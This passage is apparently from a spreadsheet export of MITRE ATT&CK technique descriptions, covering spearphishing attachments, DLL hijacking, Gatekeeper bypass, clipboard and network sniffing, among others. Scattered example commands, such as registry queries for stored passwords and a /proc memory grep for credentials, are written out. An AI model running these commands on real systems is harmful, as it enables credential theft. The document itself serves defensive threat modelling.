    <t>Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.(Citation: Unit 42 DarkHydrus July 2018) Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.
https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>T1027.008</t>
  </si>
  <si>
    <t>Stripped Payloads</t>
  </si>
  <si>
    <t>Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)
Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)
https://attack.mitre.org/techniques/T1027/008</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>Component Object Model</t>
  </si>
  <si>
    <t>Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.
https://attack.mitre.org/techniques/T1574/001</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. 
In cloud-based environments, adversaries may also use cloud APIs, data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023) 
This functionality could also be built into remote access tools. 
This technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files, as well as [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538) and [Cloud Storage Object Discovery](https://attack.mitre.org/techniques/T1619) to identify resources in cloud environments.
https://attack.mitre.org/techniques/T1119</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>Clipboard Data</t>
  </si>
  <si>
    <t>Adversaries may collect data stored in the clipboard from users copying information within or between applications. 
For example, on Windows adversaries can access clipboard data by using &lt;code&gt;clip.exe&lt;/code&gt; or &lt;code&gt;Get-Clipboard&lt;/code&gt;.(Citation: MSDN Clipboard)(Citation: clip_win_server)(Citation: CISA_AA21_200B) Additionally, adversaries may monitor then replace users’ clipboard with their data (e.g., [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002)).(Citation: mining_ruby_reversinglabs)
macOS and Linux also have commands, such as &lt;code&gt;pbpaste&lt;/code&gt;, to grab clipboard contents.(Citation: Operating with EmPyre)
https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/&lt;PID&gt;/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/&lt;PID&gt;/mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
When executing with root privileges, adversaries can search these memory locations for all processes on a system that contain patterns indicative of credentials. Adversaries may use regex patterns, such as &lt;code&gt;grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1&lt;/code&gt;, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system) When running without privileged access, processes can still view their own virtual memory locations. Some services or programs may save credentials in clear text inside the process’s memory.(Citation: MimiPenguin GitHub May 2017)(Citation: Polop Linux PrivEsc Gitbook)
If running as or with the permissions of a web browser, a process can search the `/maps` &amp; `/mem` locations for common website credential patterns (that can also be used to find adjacent memory within the same structure) in which hashes or cleartext credentials may be located.
https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>Botnet</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)
https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>Password Managers</t>
  </si>
  <si>
    <t>Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
 Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:
1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)
2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.
3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.
4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.
Adversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211)), unchecked file types, and external libraries. For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.(Citation: theevilbit gatekeeper bypass 2021)(Citation: Application Bundle Manipulation Brandon Dalton)
Applications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>Drive-by Target</t>
  </si>
  <si>
    <t>Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:
* Inserting malicious scripts into web pages or other user controllable web content such as forum posts
* Modifying script files served to websites from publicly writeable cloud storage buckets
* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)
Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).
https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as &lt;code&gt;sc query&lt;/code&gt;, &lt;code&gt;tasklist /svc&lt;/code&gt;, &lt;code&gt;systemctl --type=service&lt;/code&gt;, and &lt;code&gt;net start&lt;/code&gt;.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.
In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)
On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.
Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)
Code signing certificates may be used to bypass security policies that require signed code to execute on a system.
https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage</t>
  </si>
  <si>
    <t>Adversaries may access data from cloud storage.
Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform. 
In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly though the [Cloud API](https://attack.mitre.org/techniques/T1059/009). In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., [Data from Information Repositories](https://attack.mitre.org/techniques/T1213)). 
Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.
This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021)
Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.
https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>Credentials in Registry</t>
  </si>
  <si>
    <t>Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: &lt;code&gt;reg query HKLM /f password /t REG_SZ /s&lt;/code&gt;
* Current User Hive: &lt;code&gt;reg query HKCU /f password /t REG_SZ /s&lt;/code&gt;
https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\\\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;. For macOS, the &lt;code&gt;sharing -l&lt;/code&gt; command lists all shared points used for smb services.
https://attack.mitre.org/techniques/T1135</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>T1036.009</t>
  </si>
  <si>
    <t>Break Process Trees</t>
  </si>
  <si>
    <t>An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) 
On Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.
Another example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022)
https://attack.mitre.org/techniques/T1036/009</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>Network Topology</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.
https://attack.mitre.org/techniques/T1587/002</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018)
Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.
https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks. 
Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.
https://attack.mitre.org/techniques/T1505/002</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather detailed system information. If running with privileged access, a breakdown of system data can be gathered through the &lt;code&gt;systemsetup&lt;/code&gt; configuration tool on macOS. As an example, adversaries with user-level access can execute the &lt;code&gt;df -aH&lt;/code&gt; command to obtain currently mounted disks and associated freely available space. Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather detailed system information (e.g. &lt;code&gt;show version&lt;/code&gt;).(Citation: US-CERT-TA18-106A) [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)
Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)
https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>T1574.014</t>
  </si>
  <si>
    <t>AppDomainManager</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) 
Known as "AppDomainManager injection," adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)
https://attack.mitre.org/techniques/T1574/014</t>
  </si>
  <si>
